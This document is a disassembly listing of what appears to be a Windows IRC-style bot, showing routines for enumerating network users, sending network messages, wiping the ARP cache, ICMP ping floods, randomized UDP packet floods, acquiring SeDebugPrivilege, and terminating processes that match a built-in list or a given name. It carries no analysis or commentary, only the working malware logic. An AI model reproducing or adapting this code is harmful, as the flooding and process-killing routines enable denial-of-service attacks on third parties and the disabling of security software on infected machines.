push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40802B
jmp short loc_408094
; ---------------------------------------------------------------------------
loc_40806A: ; CODE XREF: sub_407F79+B4�j
lea eax, [ebp+Dest]
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 1Ch
loc_408094: ; CODE XREF: sub_407F79+9E�j
; sub_407F79+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_4080A7
push edi
call dword_42EC40
xor edi, edi
mov [ebp+var_4], edi
loc_4080A7: ; CODE XREF: sub_407F79+A5�j
; sub_407F79+120�j
cmp [ebp+var_C], 0EAh
jz loc_407FB8
cmp edi, esi
jz short loc_4080BF
push edi
call dword_42EC40
loc_4080BF: ; CODE XREF: sub_407F79+13D�j
push [ebp+var_8]
lea eax, [ebp+Dest]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_407F79 endp
; =============== S U B R O U T I N E =======================================
sub_4080F9 proc near ; CODE XREF: sub_4077B6+41�p
; sub_407944+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_4081AB
jz loc_4081A4
cmp eax, 7Bh
ja short loc_408170
jz short loc_408166
cmp eax, 5
jz short loc_40815C
cmp eax, 8
jz short loc_408152
cmp eax, 32h
jz short loc_408148
cmp eax, 35h
jz short loc_40813E
cmp eax, 57h
jnz loc_4081FA
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_40813E: ; CODE XREF: sub_4080F9+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_408148: ; CODE XREF: sub_4080F9+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_408152: ; CODE XREF: sub_4080F9+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_40815C: ; CODE XREF: sub_4080F9+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_408166: ; CODE XREF: sub_4080F9+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_408170: ; CODE XREF: sub_4080F9+1A�j
sub eax, 7Ch
jz short loc_40819D
sub eax, 7C8h
jz short loc_408196
dec eax
jz short loc_40818C
dec eax
jnz short loc_4081FA
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_40818C: ; CODE XREF: sub_4080F9+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40821B
; ---------------------------------------------------------------------------
loc_408196: ; CODE XREF: sub_4080F9+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_40819D: ; CODE XREF: sub_4080F9+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081A4: ; CODE XREF: sub_4080F9+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081AB: ; CODE XREF: sub_4080F9+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_4081E4
jz short loc_4081DD
sub eax, 8ADh
jz short loc_40820F
dec eax
dec eax
jz short loc_4081D6
dec eax
jz short loc_4081CF
dec eax
dec eax
jnz short loc_4081FA
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081CF: ; CODE XREF: sub_4080F9+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081D6: ; CODE XREF: sub_4080F9+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081DD: ; CODE XREF: sub_4080F9+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_4081E4: ; CODE XREF: sub_4080F9+B9�j
sub eax, 8CAh
jz short loc_408216
sub eax, 17h
jz short loc_40820F
sub eax, 25h
jz short loc_408208
sub eax, 29h
jz short loc_408201
loc_4081FA: ; CODE XREF: sub_4080F9+35�j
; sub_4080F9+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_408201: ; CODE XREF: sub_4080F9+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_408208: ; CODE XREF: sub_4080F9+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_40820F: ; CODE XREF: sub_4080F9+C2�j
; sub_4080F9+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40821B
; ---------------------------------------------------------------------------
loc_408216: ; CODE XREF: sub_4080F9+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40821B: ; CODE XREF: sub_4080F9+40�j
; sub_4080F9+4A�j ...
push offset byte_42F144 ; Dest
call _sprintf
pop ecx
mov eax, offset byte_42F144
pop ecx
retn
sub_4080F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40822D(char *Source)
sub_40822D proc near ; CODE XREF: sub_409557+1AE8�p
Dest = word ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h ; MaxCount
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+Source]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+Source], esi
call ds:dword_41B0FC ; GetComputerNameA
lea eax, [ebp+var_108]
push esi ; MaxCount
push eax ; Source
lea eax, [ebp+var_318]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Dest]
push eax ; Str
call _wcslen
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_42EBC4
test eax, eax
jnz short loc_4082BD
mov esi, offset byte_42EF40
push offset aNetMessageSent ; "[NET]: Message sent successfully."
push esi ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_4082E6
; ---------------------------------------------------------------------------
loc_4082BD: ; CODE XREF: sub_40822D+7A�j
lea ecx, [ebp+Dest]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_4080F9
pop ecx
mov esi, offset byte_42EF40
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
push esi ; Dest
call _sprintf
add esp, 14h
loc_4082E6: ; CODE XREF: sub_40822D+8E�j
mov eax, esi
pop esi
leave
retn
sub_40822D endp
; =============== S U B R O U T I N E =======================================
sub_4082EB proc near ; CODE XREF: sub_4034C2+7�p
; sub_403EEB+83�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_408313
push [esp+arg_0]
call dword_42EC34 ; gethostbyname
test eax, eax
jnz short loc_40830C
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40830C: ; CODE XREF: sub_4082EB+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_408313: ; CODE XREF: sub_4082EB+D�j
retn
sub_4082EB endp
; =============== S U B R O U T I N E =======================================
sub_408314 proc near ; CODE XREF: sub_409277+D6�p
mov ecx, dword_42EAEC
xor eax, eax
test ecx, ecx
jz short locret_408322
call ecx ; DnsFlushResolverCache
locret_408322: ; CODE XREF: sub_408314+A�j
retn
sub_408314 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408323 proc near ; CODE XREF: sub_409557:loc_40DF00�p
Dest = byte ptr -88h
Size = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+Size]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+Size], edi
mov [ebp+var_4], ebx
call dword_42EC2C ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_4083E9
sub ecx, 32h
jz loc_4083E2
sub ecx, 48h
jz short loc_408383
sub ecx, 6Eh
jz short loc_40837C
loc_408365: ; CODE XREF: sub_408323+8B�j
push eax
lea eax, [ebp+Dest]
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4083C3
; ---------------------------------------------------------------------------
loc_40837C: ; CODE XREF: sub_408323+40�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_4083B5
; ---------------------------------------------------------------------------
loc_408383: ; CODE XREF: sub_408323+3B�j
push [ebp+Size] ; Size
call _malloc
push [ebp+Size] ; Size
mov esi, eax
push edi ; Val
push esi ; Dst
call _memset
add esp, 10h
cmp esi, edi
jz short loc_4083B0
lea eax, [ebp+Size]
push ebx
push eax
push esi
call dword_42EC2C ; GetIpNetTable
cmp eax, edi
jz short loc_4083E9
jmp short loc_408365
; ---------------------------------------------------------------------------
loc_4083B0: ; CODE XREF: sub_408323+79�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_4083B5: ; CODE XREF: sub_408323+5E�j
; sub_408323+C4�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4083C3: ; CODE XREF: sub_408323+57�j
lea eax, [ebp+Dest]
mov [ebp+var_4], edi
push eax
call sub_402D63
pop ecx
loc_4083D3: ; CODE XREF: sub_408323+C8�j
; sub_408323+DC�j
push esi ; Memory
call _free
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4083E2: ; CODE XREF: sub_408323+32�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_4083B5
; ---------------------------------------------------------------------------
loc_4083E9: ; CODE XREF: sub_408323+29�j
; sub_408323+89�j
cmp [esi], edi
jbe short loc_4083D3
lea ebx, [esi+4]
loc_4083F0: ; CODE XREF: sub_408323+DA�j
push ebx
call dword_42EC28 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_4083F0
jmp short loc_4083D3
sub_408323 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408401 proc near ; CODE XREF: sub_40119B+1F�p
; .text:0040180D�p ...
Dst = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_42EB5C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset byte_42F7A8
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi ; Dest
call _sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_408401 endp
; =============== S U B R O U T I N E =======================================
sub_40845A proc near ; CODE XREF: sub_40318B+24C�p
; sub_40318B+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_408483
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_408476: ; CODE XREF: sub_40845A+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_408476
pop edi
jmp short loc_408487
; ---------------------------------------------------------------------------
loc_408483: ; CODE XREF: sub_40845A+A�j
mov edx, [esp+4+arg_0]
loc_408487: ; CODE XREF: sub_40845A+27�j
test esi, esi
pop esi
jz short loc_408491
movzx ecx, byte ptr [edx]
add eax, ecx
loc_408491: ; CODE XREF: sub_40845A+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40845A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084A7 proc near ; DATA XREF: sub_409557+26C0�o
var_10320 = byte ptr -10320h
Dest = byte ptr -344h
var_144 = dword ptr -144h
Str = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Dst = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_42EB48 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_42EBF0 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_408502
lea eax, [ebp+var_C0]
push eax
call dword_42EC34 ; gethostbyname
cmp eax, ebx
jz short loc_408508
loc_408502: ; CODE XREF: sub_4084A7+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_408565
loc_408508: ; CODE XREF: sub_4084A7+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_408548
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_405E64
add esp, 14h
loc_408548: ; CODE XREF: sub_4084A7+7F�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_30]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
loc_408565: ; CODE XREF: sub_4084A7+5F�j
cmp eax, ebx
jz short loc_408575
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_408578
; ---------------------------------------------------------------------------
loc_408575: ; CODE XREF: sub_4084A7+C0�j
mov [ebp+var_4], esi
loc_408578: ; CODE XREF: sub_4084A7+CC�j
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_408598
mov [ebp+var_3C], eax
loc_408598: ; CODE XREF: sub_4084A7+EC�j
cmp [ebp+var_38], edi
jge short loc_4085A0
mov [ebp+var_38], edi
loc_4085A0: ; CODE XREF: sub_4084A7+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_4085CD
loc_4085A7: ; CODE XREF: sub_4084A7+124�j
push [ebp+var_38]
lea eax, [ebp+Dst]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_42EAE8 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_4085A7
loc_4085CD: ; CODE XREF: sub_4084A7+FE�j
push [ebp+arg_0]
call dword_42EC68 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dest]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_408616
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_144] ; int
call sub_405E64
add esp, 14h
loc_408616: ; CODE XREF: sub_4084A7+14D�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_30]
call sub_411F56
pop ecx
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
sub_4084A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408633 proc near ; DATA XREF: sub_409557+2807�o
var_10311 = byte ptr -10311h
var_10310 = byte ptr -10310h
Dest = byte ptr -334h
var_134 = dword ptr -134h
Str = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_41B078 ; GetTickCount
push eax
call sub_41274C
pop ecx
push 11h
push 2
push 2
call dword_42EC30 ; socket
mov ebx, eax
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+Dst], 2
push eax
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_408718
lea eax, [ebp+var_B0]
push eax
call dword_42EC34 ; gethostbyname
cmp eax, edi
jnz short loc_408711
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_4086F4
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_405E64
add esp, 14h
loc_4086F4: ; CODE XREF: sub_408633+9F�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_20]
call sub_411F56
pop ecx
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
loc_408711: ; CODE XREF: sub_408633+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40871B
; ---------------------------------------------------------------------------
loc_408718: ; CODE XREF: sub_408633+6E�j
lea eax, [ebp+arg_0]
loc_40871B: ; CODE XREF: sub_408633+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_408736
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_408739
; ---------------------------------------------------------------------------
loc_408736: ; CODE XREF: sub_408633+F0�j
push [ebp+var_24]
loc_408739: ; CODE XREF: sub_408633+101�j
call dword_42EBB4 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40874B
mov [ebp+var_24], esi
loc_40874B: ; CODE XREF: sub_408633+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_408758
mov [ebp+var_24], eax
loc_408758: ; CODE XREF: sub_408633+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40876C
mov [ebp+var_28], esi
loc_40876C: ; CODE XREF: sub_408633+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40878D
loc_408773: ; CODE XREF: sub_408633+158�j
call _rand
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi+var_10311], dl
jl short loc_408773
loc_40878D: ; CODE XREF: sub_408633+13E�j
; sub_408633+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_4087EC
push 0Bh
pop esi
loc_40879A: ; CODE XREF: sub_408633+197�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_42EC14 ; sendto
push [ebp+var_28]
call ds:dword_41B048 ; Sleep
dec esi
jnz short loc_40879A
cmp [ebp+var_24], edi
jnz short loc_40878D
call _rand
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_42EBB4 ; htons
mov [ebp+var_E], ax
jmp short loc_40878D
; ---------------------------------------------------------------------------
loc_4087EC: ; CODE XREF: sub_408633+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+Dest]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40882C
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_1C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_134] ; int
call sub_405E64
add esp, 14h
loc_40882C: ; CODE XREF: sub_408633+1D7�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
push [ebp+var_20]
call sub_411F56
pop ecx
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
sub_408633 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408849 proc near ; CODE XREF: sub_407228+7�p
; sub_4088B4+5F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_41B100 ; GetCurrentProcess
push eax
call dword_42EB98 ; OpenProcessToken
test eax, eax
jnz short loc_408868
leave
retn
; ---------------------------------------------------------------------------
loc_408868: ; CODE XREF: sub_408849+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_42EB74 ; LookupPrivilegeValueA
test eax, eax
jz short loc_4088A6
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_40888F
or [ebp+var_8], 2
jmp short loc_408893
; ---------------------------------------------------------------------------
loc_40888F: ; CODE XREF: sub_408849+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_408893: ; CODE XREF: sub_408849+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_42EC1C ; AdjustTokenPrivileges
mov esi, eax
loc_4088A6: ; CODE XREF: sub_408849+32�j
push [ebp+var_4]
call ds:dword_41B050 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_408849 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4088B4(int,char *Str,int,char *Str2,int,int)
sub_4088B4 proc near ; CODE XREF: sub_408AE3+74�p
; sub_408BF8+A�p ...
Dest = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
Str1 = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_42EBD4, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_408AB3
cmp dword_42EBB8, ebx
jz loc_408AB3
cmp dword_42EAE4, ebx
jz loc_408AB3
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408849
pop ecx
pop ecx
push ebx
push 0Fh
call dword_42EBD4 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_408AA6
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_42EBB8 ; Process32First
mov esi, ds:dword_41B050
test eax, eax
jz loc_408AA1
lea eax, [ebp+var_130]
push eax
push edi
call dword_42EAE4 ; Process32Next
test eax, eax
jz loc_408AA1
mov edi, ds:dword_41B10C
mov ebx, 1F0FFFh
loc_408978: ; CODE XREF: sub_4088B4+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_4089DF
mov [ebp+var_4], offset off_421F08
loc_408986: ; CODE XREF: sub_4088B4+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+Str1]
push eax
call ds:dword_41B108 ; lstrcmpi
test eax, eax
jz short loc_4089AE
add [ebp+var_4], 4
cmp [ebp+var_4], offset aI11r54n4_exe ; "i11r54n4.exe"
jl short loc_408986
jmp loc_408A87
; ---------------------------------------------------------------------------
loc_4089AE: ; CODE XREF: sub_4088B4+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_408A87
push 0
push eax
call ds:dword_41B104 ; TerminateProcess
test eax, eax
jnz loc_408A87
loc_4089D5: ; CODE XREF: sub_4088B4+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_408A87
; ---------------------------------------------------------------------------
loc_4089DF: ; CODE XREF: sub_4088B4+C9�j
cmp [ebp+Str2], eax
jnz loc_408A72
cmp [ebp+Str], eax
jz loc_408A87
push [ebp+var_128]
push 8
call dword_42EBD4 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_408A32
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_42EA94 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_408A38
lea eax, [ebp+var_234]
jmp short loc_408A3E
; ---------------------------------------------------------------------------
loc_408A32: ; CODE XREF: sub_4088B4+15C�j
push [ebp+var_128]
loc_408A38: ; CODE XREF: sub_4088B4+174�j
lea eax, [ebp+Str1]
loc_408A3E: ; CODE XREF: sub_4088B4+17C�j
push eax
lea eax, [ebp+Dest]
push offset aSD_0 ; " %s (%d)"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push 1 ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
jmp loc_4089D5
; ---------------------------------------------------------------------------
loc_408A72: ; CODE XREF: sub_4088B4+12E�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_408ABA
loc_408A87: ; CODE XREF: sub_4088B4+F5�j
; sub_4088B4+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_42EAE4 ; Process32Next
test eax, eax
jnz loc_408978
xor ebx, ebx
loc_408AA1: ; CODE XREF: sub_4088B4+9D�j
; sub_4088B4+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_408AA6: ; CODE XREF: sub_4088B4+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408849
pop ecx
pop ecx
loc_408AB3: ; CODE XREF: sub_4088B4+3A�j
; sub_4088B4+46�j ...
xor eax, eax
loc_408AB5: ; CODE XREF: sub_4088B4+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408ABA: ; CODE XREF: sub_4088B4+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_41B104 ; TerminateProcess
test eax, eax
jnz short loc_408ADE
push edi
call esi ; CloseHandle
jmp short loc_408AB3
; ---------------------------------------------------------------------------
loc_408ADE: ; CODE XREF: sub_4088B4+223�j
push 1
pop eax
jmp short loc_408AB5
sub_4088B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AE3 proc near ; DATA XREF: sub_409557+4BE0�o
Dest = byte ptr -298h
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
